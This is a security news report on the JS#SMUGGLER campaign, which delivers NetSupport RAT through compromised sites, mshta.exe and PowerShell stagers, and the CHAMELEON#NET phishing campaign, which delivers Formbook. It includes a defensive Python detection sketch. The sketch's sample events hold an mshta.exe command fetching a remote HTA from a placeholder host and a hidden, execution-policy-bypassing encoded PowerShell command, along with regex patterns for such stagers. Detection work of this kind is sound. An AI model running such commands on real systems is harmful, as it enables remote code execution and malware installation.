Cybersecurity researchers have recently highlighted a concerning new campaign called JS#SMUGGLER, which is utilizing compromised websites to distribute a remote access trojan known as NetSupport RAT. An analysis conducted by Securonix reveals a sophisticated attack chain that involves three primary components: an obfuscated JavaScript loader embedded within a compromised website, an HTML Application (HTA) that executes encrypted PowerShell stagers using “mshta.exe,” and a PowerShell payload designed to download and run the main malware.
According to researchers Akshay Gaikwad, Shikha Sangwan, and Aaron Beardslee, NetSupport RAT provides attackers with comprehensive control over victim hosts. This includes remote desktop access, file operations, command execution capabilities, data theft, and proxy functions. At this point in time, there is minimal evidence linking this campaign to any specific threat group or nation, but the activity predominantly targets enterprise users via compromised websites, suggesting an extensive operational effort.
The researchers describe the operation as a multi-stage, web-based malware deployment that employs hidden iframes, obfuscated loaders, and layered script execution techniques to facilitate malware installation and remote control. The initial phase of the attack features silent redirects embedded in infected websites, allowing the retrieval of a heavily scrambled JavaScript loader, referred to as “phone.js,” from an external domain. This loader assesses the device it is executed on, determining whether to display a full-screen iframe for mobile users or to load an additional remote script for desktop users.
The invisible iframe is designed to redirect users to a malicious URL, and the JavaScript loader employs a tracking mechanism to ensure that its malicious activities are triggered only once during the victim’s first visit, thereby minimizing the likelihood of detection. This adaptive mechanism allows attackers to tailor their infection process, concealing malicious actions in specific environments and enhancing their success rate by delivering payloads suited to the particular platform.
In subsequent stages of the attack, the remote script initialized in the first phase constructs a URL from which an HTA payload is downloaded and executed using “mshta.exe.” This HTA payload acts as a secondary loader for a temporary PowerShell stager, which is decrypted and executed in memory to evade detection. Additionally, the HTA file is designed to run covertly, disabling visible window elements and minimizing at startup. Upon execution, the decrypted payload also removes the PowerShell stager from disk and terminates itself to leave a minimal forensic footprint.
The primary objective of the PowerShell payload is to retrieve and deploy NetSupport RAT, thereby granting attackers complete control over the compromised system. Securonix noted the sophistication of the operation and the layered evasion techniques employed, suggesting a professionally maintained malware framework. To effectively combat such attacks, they recommend implementing strong Content Security Policy (CSP) enforcement, script monitoring, PowerShell logging, mshta.exe restrictions, and behavioral analytics.
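The process chain described above (mshta.exe fetching a remote HTA, then spawning a hidden PowerShell stager) is something the recommended PowerShell logging and mshta.exe monitoring can surface. The following is an added detection sketch, not code from Securonix or the original write-up; it runs over constructed process-creation events whose field names mirror Sysmon Event ID 1, and the URL, paths and encoded command in the samples are placeholders.

```python
"""Detection sketch for the JS#SMUGGLER process chain: mshta.exe launched
with a remote HTA source, followed by a PowerShell stager spawned from it.
Events and their values are constructed for this example."""
import re

# Constructed sample events: (pid, parent_pid, image_path, command_line)
SAMPLE_EVENTS = [
    (1000, 900, r"C:\Program Files\Chrome\chrome.exe", "chrome.exe --type=renderer"),
    (1200, 1000, r"C:\Windows\System32\mshta.exe",
     "mshta.exe http://placeholder.example/stage.hta"),
    (1300, 1200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -w hidden -ep bypass -enc SQBFAFgA"),
    # Benign: a locally stored HTA run by an admin tool (should not fire)
    (1400, 500, r"C:\Windows\System32\mshta.exe", r"mshta.exe C:\Tools\local_admin_tool.hta"),
    # Benign: scheduled script whose parent is not in the event window
    (1500, 600, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -File C:\Scripts\backup.ps1"),
]

# mshta.exe given an http(s) URL instead of a local .hta path
REMOTE_HTA = re.compile(r"https?://\S+", re.IGNORECASE)
# Switches typical of an in-memory stager: encoded command, hidden window, bypassed policy
STAGER_FLAGS = re.compile(r"-(?:enc|encodedcommand|w\s+hidden|ep\s+bypass)\b", re.IGNORECASE)


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return a list of (pid, rule_name) findings, in event order."""
    by_pid = {pid: (ppid, img, cmd) for pid, ppid, img, cmd in events}
    findings = []
    for pid, ppid, img, cmd in events:
        name = image_name(img)
        # Rule 1: mshta.exe executing an HTA pulled from a remote URL
        if name == "mshta.exe" and REMOTE_HTA.search(cmd):
            findings.append((pid, "mshta_remote_hta"))
        # Rule 2: PowerShell with stager-style switches whose parent is mshta.exe
        if name == "powershell.exe" and ppid in by_pid:
            parent_name = image_name(by_pid[ppid][1])
            if parent_name == "mshta.exe" and STAGER_FLAGS.search(cmd):
                findings.append((pid, "mshta_spawns_powershell_stager"))
    return findings


if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

Rule 2 only correlates parents present in the same event window; in a real pipeline the parent lookup would come from the SIEM's process tree rather than an in-memory dict.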
The announcement of the JS#SMUGGLER campaign follows closely on the heels of another multi-stage malspam operation, CHAMELEON#NET, recently analyzed by the same cybersecurity firm. This earlier campaign was designed to deliver Formbook, a keylogger and information-stealing malware, using phishing emails to target individuals in the National Social Security Sector. These emails trick victims into downloading a seemingly harmless archive, which then initiates a complex infection chain.
The initial phase of the CHAMELEON#NET campaign starts with a phishing email that prompts users to download a .BZ2 archive. The payload—an obfuscated JavaScript file—serves as a dropper, leading to the execution of a sophisticated VB.NET loader. This loader employs advanced reflection and a customized conditional XOR cipher for decryption.
The JavaScript dropper also creates two additional JavaScript files in the %TEMP% directory. The first, svchost.js, drops a .NET loader executable named DarkTortilla (“QNaZg.exe”), a crypter frequently used for distributing subsequent payloads. The second file, adobe.js, releases an MSI installer package titled “PHat.jar,” which behaves similarly to svchost.js.
Ultimately, the loader is configured to decrypt and run an embedded DLL containing the Formbook malware, ensuring persistence by adding itself to the Windows startup folder or managing persistence via the Windows Registry. The researchers emphasize that the threat actors effectively combine social engineering tactics, heavy script obfuscation, and advanced .NET evasion methods to compromise their targets successfully. The custom decryption routines, followed by reflective loading, allow the final payload to execute in a fileless manner, complicating detection and forensic analysis significantly.

